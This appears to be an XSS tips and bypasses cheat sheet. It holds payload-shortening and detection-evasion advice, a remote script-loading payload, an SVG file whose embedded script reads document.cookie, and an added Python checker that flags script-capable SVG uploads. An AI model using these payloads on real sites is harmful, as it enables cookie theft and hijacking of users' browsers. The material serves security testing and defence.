XSS Tricks/Bypasses

Tips

  • http(s):// can be shortened to // or /\\ or \\.

  • document.cookie can be shortened to cookie. It applies to other DOM objects as well.

  • alert and other pop-up functions don't need a value, so stop doing alert('XSS') and start doing alert().

  • You can use // to close a tag instead of >.

  • I have found that confirm is the least detected pop-up function, so stop using alert.

  • Quotes around an attribute value aren't necessary as long as the value doesn't contain spaces. You can use <script src=//14.rs> instead of <script src="//14.rs">.

  • The shortest HTML-context XSS payload is <script src=//14.rs> (19 chars).

XSS inside SVG file

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
	<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
	<script type="text/javascript">
		alert(document.cookie);
	</script>
</svg>
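A server-side check for uploaded SVGs, added here as an example and not part of the original page: it parses the document and flags what makes an SVG script-capable, the <script> element shown above, on* event-handler attributes, and javascript: links, so such files can be rejected at upload time. The three sample documents (the page's SVG plus a clean one and a handler-only one) are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the SVG from this page, which carries a <script> element.
SVG_WITH_SCRIPT = """<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert(document.cookie);</script>
</svg>"""

# Constructed sample: a benign image with no active content.
SVG_CLEAN = '<svg xmlns="http://www.w3.org/2000/svg"><circle r="5" fill="red"/></svg>'

# Constructed sample: no <script>, but an event handler and a javascript: link.
SVG_HANDLER = ('<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
               '<a xlink:href="javascript:confirm()"><rect onmouseover="confirm()" width="9" height="9"/></a></svg>')

ACTIVE_ELEMENTS = {"script", "foreignobject"}   # foreignObject can embed HTML
URI_ATTRIBUTES = {"href"}                        # covers href and xlink:href after namespace stripping


def _local(name):
    """Strip the XML namespace: '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return name.rsplit("}", 1)[-1].lower()


def find_active_content(svg_text):
    """Return a list of findings describing executable content in an SVG document.

    An empty list means nothing script-capable was found. The stdlib expat parser
    does not fetch the external DTD; for untrusted uploads in production, parse
    with defusedxml as well so entity-expansion attacks are blocked too.
    """
    findings = []
    root = ET.fromstring(svg_text)
    for elem in root.iter():                     # document order, root included
        tag = _local(elem.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"element:{tag}")
        for attr, value in elem.attrib.items():
            name = _local(attr)
            if name.startswith("on"):            # onload, onmouseover, onbegin, ...
                findings.append(f"attribute:{name}")
            # Drop all whitespace first so a split scheme such as "java\nscript:" is still caught.
            scheme = "".join(value.split()).lower()
            if name in URI_ATTRIBUTES and scheme.startswith("javascript:"):
                findings.append(f"uri:{name}")
    return findings


def is_safe_svg(svg_text):
    """True only when the document parses and carries no active content."""
    try:
        return not find_active_content(svg_text)
    except ET.ParseError:
        return False
```

Rejecting such files at upload time complements serving user-supplied SVGs from a separate origin with Content-Disposition: attachment, since an SVG referenced from an <img> tag does not run scripts but a direct navigation to the file does.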

Nice payloads/bypasses
